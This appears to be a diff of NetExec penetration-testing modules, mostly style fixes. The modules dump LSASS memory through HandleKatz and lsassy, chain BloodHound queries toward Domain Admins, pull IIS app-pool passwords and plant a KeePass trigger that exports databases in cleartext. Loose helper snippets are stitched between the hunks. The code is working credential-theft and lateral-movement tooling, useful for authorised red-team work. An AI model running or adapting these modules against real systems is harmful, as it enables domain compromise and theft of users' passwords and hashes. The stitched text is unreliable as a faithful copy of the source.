@ -52,12 +49,19 @@ class NXCModule:
|
||||||
self.dir_result = module_options["DIR_RESULT"]
|
self.dir_result = module_options["DIR_RESULT"]
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
|
handlekatz_loc = self.handlekatz_path + self.handlekatz
|
||||||
|
|
||||||
if self.useembeded:
|
if self.useembeded:
|
||||||
with open(self.handlekatz_path + self.handlekatz, "wb") as handlekatz:
|
try:
|
||||||
handlekatz.write(self.handlekatz_embeded)
|
with open(handlekatz_loc, "wb") as handlekatz:
|
||||||
|
handlekatz.write(self.handlekatz_embeded)
|
||||||
|
except FileNotFoundError:
|
||||||
|
context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
|
context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
|
||||||
with open(self.handlekatz_path + self.handlekatz, "rb") as handlekatz:
|
|
||||||
|
with open(handlekatz_loc, "rb") as handlekatz:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
|
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
|
||||||
context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
|
context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
|
||||||
|
@ -73,7 +77,7 @@ class NXCModule:
|
||||||
p = p[0]
|
p = p[0]
|
||||||
|
|
||||||
if not p or p == "None":
|
if not p or p == "None":
|
||||||
context.log.fail(f"Failed to execute command to get LSASS PID")
|
context.log.fail("Failed to execute command to get LSASS PID")
|
||||||
return
|
return
|
||||||
# we get a CSV string back from `tasklist`, so we grab the PID from it
|
# we get a CSV string back from `tasklist`, so we grab the PID from it
|
||||||
pid = p.split(",")[1][1:-1]
|
pid = p.split(",")[1][1:-1]
|
||||||
|
@ -121,17 +125,17 @@ class NXCModule:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}")
|
||||||
|
|
||||||
h_in = open(self.dir_result + machine_name, "rb")
|
h_in = open(self.dir_result + machine_name, "rb") # noqa: SIM115
|
||||||
h_out = open(self.dir_result + machine_name + ".decode", "wb")
|
h_out = open(self.dir_result + machine_name + ".decode", "wb") # noqa: SIM115
|
||||||
|
|
||||||
bytes_in = bytearray(h_in.read())
|
bytes_in = bytearray(h_in.read())
|
||||||
bytes_in_len = len(bytes_in)
|
bytes_in_len = len(bytes_in)
|
||||||
|
|
||||||
context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)")
|
context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)")
|
||||||
|
|
||||||
chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)]
|
chunks = [bytes_in[i: i + 1000000] for i in range(0, bytes_in_len, 1000000)]
|
||||||
for chunk in chunks:
|
for chunk in chunks:
|
||||||
for i in range(0, len(chunk)):
|
for i in range(len(chunk)):
|
||||||
chunk[i] ^= 0x41
|
chunk[i] ^= 0x41
|
||||||
|
|
||||||
h_out.write(bytes(chunk))
|
h_out.write(bytes(chunk))
|
||||||
|
@ -177,4 +181,4 @@ class NXCModule:
|
||||||
if len(credz_bh) > 0:
|
if len(credz_bh) > 0:
|
||||||
add_user_bh(credz_bh, None, context.log, connection.config)
|
add_user_bh(credz_bh, None, context.log, connection.config)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error opening dump file", str(e))
|
context.log.fail(f"Error opening dump file: {e}")
|
||||||
|
|
|
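The deobfuscation loop in the handlekatz module above XORs the dump with 0x41 in 1 MB chunks before handing the result to pypykatz. A standalone sketch of the same transform, reading the file chunk by chunk instead of all at once (file paths here are placeholders):

def deobfuscate_dump(path_in: str, path_out: str, chunk_size: int = 1_000_000) -> None:
    """Stream-XOR a HandleKatz dump with 0x41, the transform applied above."""
    with open(path_in, "rb") as h_in, open(path_out, "wb") as h_out:
        chunk = bytearray(h_in.read(chunk_size))
        while chunk:
            for i in range(len(chunk)):
                chunk[i] ^= 0x41  # HandleKatz obfuscates the dump by XOR-ing every byte with 0x41
            h_out.write(bytes(chunk))
            chunk = bytearray(h_in.read(chunk_size))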
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author: Peter Gormington (@hackerm00n on Twitter)
|
# Author: Peter Gormington (@hackerm00n on Twitter)
|
||||||
import logging
|
import logging
|
||||||
from sqlite3 import connect
|
from sqlite3 import connect
|
||||||
|
@ -12,7 +10,6 @@ from lsassy.session import Session
|
||||||
from lsassy.impacketfile import ImpacketFile
|
from lsassy.impacketfile import ImpacketFile
|
||||||
|
|
||||||
credentials_data = []
|
credentials_data = []
|
||||||
admin_results = []
|
|
||||||
found_users = []
|
found_users = []
|
||||||
reported_da = []
|
reported_da = []
|
||||||
|
|
||||||
|
@ -24,9 +21,9 @@ def neo4j_conn(context, connection, driver):
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
list(session.run("MATCH (g:Group) return g LIMIT 1"))
|
list(session.run("MATCH (g:Group) return g LIMIT 1"))
|
||||||
context.log.display("Connection Successful!")
|
context.log.display("Connection Successful!")
|
||||||
except AuthError as e:
|
except AuthError:
|
||||||
context.log.fail("Invalid credentials")
|
context.log.fail("Invalid credentials")
|
||||||
except ServiceUnavailable as e:
|
except ServiceUnavailable:
|
||||||
context.log.fail("Could not connect to neo4j database")
|
context.log.fail("Could not connect to neo4j database")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error querying domain admins")
|
context.log.fail("Error querying domain admins")
|
||||||
|
@ -37,15 +34,14 @@ def neo4j_conn(context, connection, driver):
|
||||||
|
|
||||||
|
|
||||||
def neo4j_local_admins(context, driver):
|
def neo4j_local_admins(context, driver):
|
||||||
global admin_results
|
|
||||||
try:
|
try:
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
|
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
|
||||||
context.log.success("Admins and PCs obtained.")
|
context.log.success("Admins and PCs obtained")
|
||||||
except Exception:
|
except Exception as e:
|
||||||
context.log.fail("Could not pull admins")
|
context.log.fail(f"Could not pull admins: {e}")
|
||||||
exit()
|
return None
|
||||||
admin_results = [record for record in admins.data()]
|
return list(admins.data())
|
||||||
|
|
||||||
|
|
||||||
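For context, the Cypher query shown above can be run on its own with the neo4j Python driver; a hedged sketch, where the Bolt URI and the neo4j credentials are placeholders:

from neo4j import GraphDatabase, basic_auth

# same BloodHound query as in the hunk above: computers with their local admins
QUERY = (
    "MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) "
    "OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) "
    "WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins "
    "RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,"
    "COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC"
)

driver = GraphDatabase.driver("bolt://127.0.0.1:7687", auth=basic_auth("neo4j", "bloodhound"), encrypted=False)
with driver.session() as session:
    for record in session.run(QUERY).data():
        print(record["COMPUTER"], record["ADMIN_COUNT"], record["USERS"])
driver.close()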
def create_db(local_admins, dbconnection, cursor):
|
def create_db(local_admins, dbconnection, cursor):
|
||||||
|
@ -69,7 +65,7 @@ def create_db(local_admins, dbconnection, cursor):
|
||||||
if user not in admin_users:
|
if user not in admin_users:
|
||||||
admin_users.append(user)
|
admin_users.append(user)
|
||||||
for user in admin_users:
|
for user in admin_users:
|
||||||
cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user])
|
cursor.execute("INSERT OR IGNORE INTO admin_users(username) VALUES(?)", [user])
|
||||||
dbconnection.commit()
|
dbconnection.commit()
|
||||||
|
|
||||||
|
|
||||||
|
@ -107,13 +103,13 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d
|
||||||
session = driver.session()
|
session = driver.session()
|
||||||
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned')
|
||||||
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
|
path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p")
|
||||||
paths = [record for record in path_to_da.data()]
|
paths = list(path_to_da.data())
|
||||||
|
|
||||||
for path in paths:
|
for path in paths:
|
||||||
if path:
|
if path:
|
||||||
for key, value in path.items():
|
for value in path.values():
|
||||||
for item in value:
|
for item in value:
|
||||||
if type(item) == dict:
|
if isinstance(item, dict):
|
||||||
if {item["name"]} not in reported_da:
|
if {item["name"]} not in reported_da:
|
||||||
context.log.success(f"You have a valid path to DA as {item['name']}.")
|
context.log.success(f"You have a valid path to DA as {item['name']}.")
|
||||||
reported_da.append({item["name"]})
|
reported_da.append({item["name"]})
|
||||||
|
@ -147,15 +143,17 @@ class NXCModule:
|
||||||
self.reset = None
|
self.reset = None
|
||||||
self.reset_dumped = None
|
self.reset_dumped = None
|
||||||
self.method = None
|
self.method = None
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
|
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
|
||||||
host_id = context.db.get_computers(connection.host)[0][0]
|
host_id = context.db.get_computers(connection.host)[0][0]
|
||||||
if password is not None:
|
if password is not None:
|
||||||
credential_type = 'plaintext'
|
credential_type = "plaintext"
|
||||||
else:
|
else:
|
||||||
credential_type = 'hash'
|
credential_type = "hash"
|
||||||
password = ':'.join(h for h in [lmhash, nthash] if h is not None)
|
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
||||||
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
|
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
METHOD Method to use to dump lsass.exe with lsassy
|
METHOD Method to use to dump lsass.exe with lsassy
|
||||||
|
@ -173,7 +171,7 @@ class NXCModule:
|
||||||
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
|
# lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours)
|
||||||
# so what we do is define "success" as a logging level, then do nothing with the output
|
# so what we do is define "success" as a logging level, then do nothing with the output
|
||||||
logging.addLevelName(25, "SUCCESS")
|
logging.addLevelName(25, "SUCCESS")
|
||||||
setattr(logging, "success", lambda message, *args: ())
|
logging.success = lambda message, *args: ()
|
||||||
|
|
||||||
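The two comment lines above describe working around lsassy's logger hijacking by registering the level it expects and pointing logging.success at a no-op; the trick in isolation (nothing below is lsassy-specific):

import logging

logging.addLevelName(25, "SUCCESS")            # level number/name the third-party library expects
logging.success = lambda message, *args: None  # swallow any logging.success(...) call

logging.success("this is silently discarded")  # no output, no AttributeError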
host = connection.host
|
host = connection.host
|
||||||
domain_name = connection.domain
|
domain_name = connection.domain
|
||||||
|
@ -198,7 +196,7 @@ class NXCModule:
|
||||||
return False
|
return False
|
||||||
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
||||||
if dumper is None:
|
if dumper is None:
|
||||||
context.log.fail("Unable to load dump method '{}'".format(self.method))
|
context.log.fail(f"Unable to load dump method '{self.method}'")
|
||||||
return False
|
return False
|
||||||
file = dumper.dump()
|
file = dumper.dump()
|
||||||
if file is None:
|
if file is None:
|
||||||
|
@ -247,10 +245,10 @@ class NXCModule:
|
||||||
if len(more_to_dump) > 0:
|
if len(more_to_dump) > 0:
|
||||||
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
|
context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.")
|
||||||
connection.domain = user[0].split("@")[1]
|
connection.domain = user[0].split("@")[1]
|
||||||
setattr(connection, "host", pc[0].split(".")[0])
|
connection.host = pc[0].split(".")[0]
|
||||||
setattr(connection, "username", user[0].split("@")[0])
|
connection.username = user[0].split("@")[0]
|
||||||
setattr(connection, "nthash", user[1])
|
connection.nthash = user[1]
|
||||||
setattr(connection, "nthash", user[1])
|
connection.nthash = user[1]
|
||||||
try:
|
try:
|
||||||
self.run_lsassy(context, connection, cursor)
|
self.run_lsassy(context, connection, cursor)
|
||||||
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
|
cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'")
|
||||||
|
@ -302,7 +300,7 @@ class NXCModule:
|
||||||
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
|
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
|
||||||
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
|
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
|
||||||
neo4j_conn(context, connection, driver)
|
neo4j_conn(context, connection, driver)
|
||||||
neo4j_local_admins(context, driver)
|
admin_results = neo4j_local_admins(context, driver)
|
||||||
create_db(admin_results, dbconnection, cursor)
|
create_db(admin_results, dbconnection, cursor)
|
||||||
initial_run(connection, cursor)
|
initial_run(connection, cursor)
|
||||||
context.log.display("Running lsassy")
|
context.log.display("Running lsassy")
|
||||||
|
|
|
@ -1,16 +1,13 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
|
Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
|
||||||
|
|
||||||
Module by Brandon Fisher @shad0wcntr0ller
|
Module by Brandon Fisher @shad0wcntr0ller
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = 'iis'
|
name = "iis"
|
||||||
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
|
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
|
||||||
supported_protocols = ['smb']
|
supported_protocols = ["smb"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
|
@ -24,29 +21,26 @@ class NXCModule:
|
||||||
self.check_appcmd(context, connection)
|
self.check_appcmd(context, connection)
|
||||||
|
|
||||||
def check_appcmd(self, context, connection):
|
def check_appcmd(self, context, connection):
|
||||||
|
if not hasattr(connection, "has_run"):
|
||||||
if not hasattr(connection, 'has_run'):
|
|
||||||
connection.has_run = False
|
connection.has_run = False
|
||||||
|
|
||||||
|
|
||||||
if connection.has_run:
|
if connection.has_run:
|
||||||
return
|
return
|
||||||
|
|
||||||
connection.has_run = True
|
connection.has_run = True
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
connection.conn.listPath('C$', '\\Windows\\System32\\inetsrv\\appcmd.exe')
|
connection.conn.listPath("C$", "\\Windows\\System32\\inetsrv\\appcmd.exe")
|
||||||
self.execute_appcmd(context, connection)
|
self.execute_appcmd(context, connection)
|
||||||
except:
|
except Exception as e:
|
||||||
context.log.fail("appcmd.exe not found, this module is not applicable.")
|
context.log.fail(f"appcmd.exe not found, this module is not applicable - {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
def execute_appcmd(self, context, connection):
|
def execute_appcmd(self, context, connection):
|
||||||
command = f'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
|
command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
|
||||||
context.log.info(f'Checking For Hidden Credentials With Appcmd.exe')
|
context.log.info("Checking For Hidden Credentials With Appcmd.exe")
|
||||||
output = connection.execute(command, True)
|
output = connection.execute(command, True)
|
||||||
|
|
||||||
lines = output.splitlines()
|
lines = output.splitlines()
|
||||||
username = None
|
username = None
|
||||||
password = None
|
password = None
|
||||||
|
@ -55,20 +49,19 @@ class NXCModule:
|
||||||
credentials_set = set()
|
credentials_set = set()
|
||||||
|
|
||||||
for line in lines:
|
for line in lines:
|
||||||
if 'APPPOOL.NAME:' in line:
|
if "APPPOOL.NAME:" in line:
|
||||||
apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('"')
|
apppool_name = line.split("APPPOOL.NAME:")[1].strip().strip('"')
|
||||||
if "userName:" in line:
|
if "userName:" in line:
|
||||||
username = line.split("userName:")[1].strip().strip('"')
|
username = line.split("userName:")[1].strip().strip('"')
|
||||||
if "password:" in line:
|
if "password:" in line:
|
||||||
password = line.split("password:")[1].strip().strip('"')
|
password = line.split("password:")[1].strip().strip('"')
|
||||||
|
|
||||||
|
if apppool_name and username is not None and password is not None:
|
||||||
if apppool_name and username is not None and password is not None:
|
|
||||||
current_credentials = (apppool_name, username, password)
|
current_credentials = (apppool_name, username, password)
|
||||||
|
|
||||||
if current_credentials not in credentials_set:
|
if current_credentials not in credentials_set:
|
||||||
credentials_set.add(current_credentials)
|
credentials_set.add(current_credentials)
|
||||||
|
|
||||||
if username:
|
if username:
|
||||||
context.log.success(f"Credentials Found for APPPOOL: {apppool_name}")
|
context.log.success(f"Credentials Found for APPPOOL: {apppool_name}")
|
||||||
if password == "":
|
if password == "":
|
||||||
|
@ -76,7 +69,6 @@ class NXCModule:
|
||||||
else:
|
else:
|
||||||
context.log.highlight(f"Username: {username}, Password: {password}")
|
context.log.highlight(f"Username: {username}, Password: {password}")
|
||||||
|
|
||||||
|
|
||||||
username = None
|
username = None
|
||||||
password = None
|
password = None
|
||||||
apppool_name = None
|
apppool_name = None
|
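A hedged sketch of the same line-by-line parsing against canned appcmd output; the sample text below is illustrative, not captured from a real host:

# illustrative output of: appcmd.exe list apppool /@t:*
sample_output = '''APPPOOL.NAME:"DefaultAppPool"
userName:"IIS\\svc_web"
password:"S3cr3tValue"
'''

username = password = apppool_name = None
for line in sample_output.splitlines():
    if "APPPOOL.NAME:" in line:
        apppool_name = line.split("APPPOOL.NAME:")[1].strip().strip('"')
    if "userName:" in line:
        username = line.split("userName:")[1].strip().strip('"')
    if "password:" in line:
        password = line.split("password:")[1].strip().strip('"')
    if apppool_name and username is not None and password is not None:
        print(f"{apppool_name}: {username} / {password}")
        username = password = apppool_name = None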
File diff suppressed because one or more lines are too long
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.dcerpc.v5 import rrp
|
from impacket.dcerpc.v5 import rrp
|
||||||
from impacket.dcerpc.v5 import scmr
|
from impacket.dcerpc.v5 import scmr
|
||||||
from impacket.examples.secretsdump import RemoteOperations
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/
|
# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/
|
||||||
# Airbus CERT
|
# Airbus CERT
|
||||||
# module by @mpgn_x64
|
# module by @mpgn_x64
|
||||||
|
@ -36,7 +33,6 @@ class NXCModule:
|
||||||
|
|
||||||
context.log.debug("[*] Retrieving network interface of " + connection.host)
|
context.log.debug("[*] Retrieving network interface of " + connection.host)
|
||||||
|
|
||||||
# NetworkAddr = bindings[0]['aNetworkAddr']
|
|
||||||
for binding in bindings:
|
for binding in bindings:
|
||||||
NetworkAddr = binding["aNetworkAddr"]
|
NetworkAddr = binding["aNetworkAddr"]
|
||||||
try:
|
try:
|
|
@ -20,7 +20,7 @@ class NXCModule:
|
||||||
self.search_path = "'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'"
|
self.search_path = "'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'"
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
SEARCH_TYPE Specify what to search, between:
|
SEARCH_TYPE Specify what to search, between:
|
||||||
PROCESS Look for running KeePass.exe process only
|
PROCESS Look for running KeePass.exe process only
|
||||||
FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time
|
FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time
|
||||||
|
@ -29,7 +29,6 @@ class NXCModule:
|
||||||
SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)
|
SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)
|
||||||
Default: 'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'
|
Default: 'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if "SEARCH_PATH" in module_options:
|
if "SEARCH_PATH" in module_options:
|
||||||
self.search_path = module_options["SEARCH_PATH"]
|
self.search_path = module_options["SEARCH_PATH"]
|
||||||
|
|
||||||
|
@ -49,20 +48,14 @@ class NXCModule:
|
||||||
keepass_process_id = row[0]
|
keepass_process_id = row[0]
|
||||||
keepass_process_username = row[1]
|
keepass_process_username = row[1]
|
||||||
keepass_process_name = row[2]
|
keepass_process_name = row[2]
|
||||||
context.log.highlight(
|
context.log.highlight(f'Found process "{keepass_process_name}" with PID {keepass_process_id} (user {keepass_process_username})')
|
||||||
'Found process "{}" with PID {} (user {})'.format(
|
|
||||||
keepass_process_name,
|
|
||||||
keepass_process_id,
|
|
||||||
keepass_process_username,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
if row_number == 0:
|
if row_number == 0:
|
||||||
context.log.display("No KeePass-related process was found")
|
context.log.display("No KeePass-related process was found")
|
||||||
|
|
||||||
# search for keepass-related files
|
# search for keepass-related files
|
||||||
if self.search_type == "ALL" or self.search_type == "FILES":
|
if self.search_type == "ALL" or self.search_type == "FILES":
|
||||||
search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format(self.search_path)
|
search_keepass_files_payload = f"Get-ChildItem -Path {self.search_path} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName"
|
||||||
search_keepass_files_cmd = 'powershell.exe "{}"'.format(search_keepass_files_payload)
|
search_keepass_files_cmd = f'powershell.exe "{search_keepass_files_payload}"'
|
||||||
search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n")
|
search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n")
|
||||||
found = False
|
found = False
|
||||||
found_xml = False
|
found_xml = False
|
||||||
|
@ -71,7 +64,7 @@ class NXCModule:
|
||||||
if "xml" in file:
|
if "xml" in file:
|
||||||
found_xml = True
|
found_xml = True
|
||||||
found = True
|
found = True
|
||||||
context.log.highlight("Found {}".format(file))
|
context.log.highlight(f"Found {file}")
|
||||||
if not found:
|
if not found:
|
||||||
context.log.display("No KeePass-related file were found")
|
context.log.display("No KeePass-related file were found")
|
||||||
elif not found_xml:
|
elif not found_xml:
|
||||||
|
|
|
@ -46,17 +46,17 @@ class NXCModule:
|
||||||
self.poll_frequency_seconds = 5
|
self.poll_frequency_seconds = 5
|
||||||
self.dummy_service_name = "OneDrive Sync KeePass"
|
self.dummy_service_name = "OneDrive Sync KeePass"
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file:
|
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1")) as remove_trigger_script_file:
|
||||||
self.remove_trigger_script_str = remove_trigger_script_file.read()
|
self.remove_trigger_script_str = remove_trigger_script_file.read()
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file:
|
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1")) as add_trigger_script_file:
|
||||||
self.add_trigger_script_str = add_trigger_script_file.read()
|
self.add_trigger_script_str = add_trigger_script_file.read()
|
||||||
|
|
||||||
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file:
|
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1")) as restart_keepass_script_file:
|
||||||
self.restart_keepass_script_str = restart_keepass_script_file.read()
|
self.restart_keepass_script_str = restart_keepass_script_file.read()
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
ACTION (mandatory) Performs one of the following actions, specified by the user:
|
ACTION (mandatory) Performs one of the following actions, specified by the user:
|
||||||
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
|
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
|
||||||
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
|
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
|
||||||
|
@ -74,7 +74,7 @@ class NXCModule:
|
||||||
USER Targeted user running KeePass, used to restart the appropriate process
|
USER Targeted user running KeePass, used to restart the appropriate process
|
||||||
(used by RESTART action)
|
(used by RESTART action)
|
||||||
|
|
||||||
EXPORT_NAME Name fo the database export file, default: export.xml
|
EXPORT_NAME Name of the database export file, default: export.xml
|
||||||
EXPORT_PATH Path where to export the KeePass database in cleartext
|
EXPORT_PATH Path where to export the KeePass database in cleartext
|
||||||
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
|
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
|
||||||
|
|
||||||
|
@ -86,7 +86,6 @@ class NXCModule:
|
||||||
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
|
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
|
||||||
but they can still be easily edited in the module __init__ code if needed
|
but they can still be easily edited in the module __init__ code if needed
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if "ACTION" in module_options:
|
if "ACTION" in module_options:
|
||||||
if module_options["ACTION"] not in [
|
if module_options["ACTION"] not in [
|
||||||
"ADD",
|
"ADD",
|
||||||
|
@ -98,12 +97,12 @@ class NXCModule:
|
||||||
"ALL",
|
"ALL",
|
||||||
]:
|
]:
|
||||||
context.log.fail("Unrecognized action, use --options to list available parameters")
|
context.log.fail("Unrecognized action, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
else:
|
else:
|
||||||
self.action = module_options["ACTION"]
|
self.action = module_options["ACTION"]
|
||||||
else:
|
else:
|
||||||
context.log.fail("Missing ACTION option, use --options to list available parameters")
|
context.log.fail("Missing ACTION option, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if "KEEPASS_CONFIG_PATH" in module_options:
|
if "KEEPASS_CONFIG_PATH" in module_options:
|
||||||
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
|
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
|
||||||
|
@ -120,7 +119,7 @@ class NXCModule:
|
||||||
if "PSH_EXEC_METHOD" in module_options:
|
if "PSH_EXEC_METHOD" in module_options:
|
||||||
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
|
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
|
||||||
context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
|
